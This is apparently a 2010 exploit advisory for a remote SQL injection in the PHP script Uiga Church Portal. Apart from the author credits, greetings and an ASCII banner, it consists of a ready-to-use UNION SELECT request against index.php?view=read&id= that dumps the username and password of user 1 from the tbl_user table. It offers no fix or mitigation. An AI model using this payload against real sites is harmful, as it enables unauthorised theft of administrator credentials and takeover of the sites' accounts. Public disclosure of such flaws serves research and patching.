Uiga Church Portal suffers from a remote SQL injection vulnerability.
a70ab20bd3b0e710e1c1d2297210025aa7018c0d2071391b152e900d46c8752a
----------------------------Information------------------------------------------------
+Name : Uiga Church Portal index.php SQL Injection
+Autor : Easy Laster
+Date : 01.03.2010
+Script : Uiga Church Portal
+Download : https://www.uiga.com/downloads/ucp_pro.zip
+Demo :https://www.uiga.com/product/demo/church/pro/index.php
+Price : 00,00$
+Language :PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Damian,novaca!ne.
/product/demo/church/pro/
---------------------------------------------------------------------------------------
___ ___ ___ ___ _ _ _____ _ _
| | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_
|_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _|
|_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_|
|___| |___|
----------------------------------------------------------------------------------------
+Vulnerability : https://www.site.com/portal/index.php?view=read&id=
+Exploitable : https://www.site.com/portal/index.php?view=read&id=111111111+union+
select+1,concat(user_name,0x3a,password),3,4,5,6,7,8,9,10,11,12+from+tbl_user
+where+user_id=1--
-----------------------------------------------------------------------------------------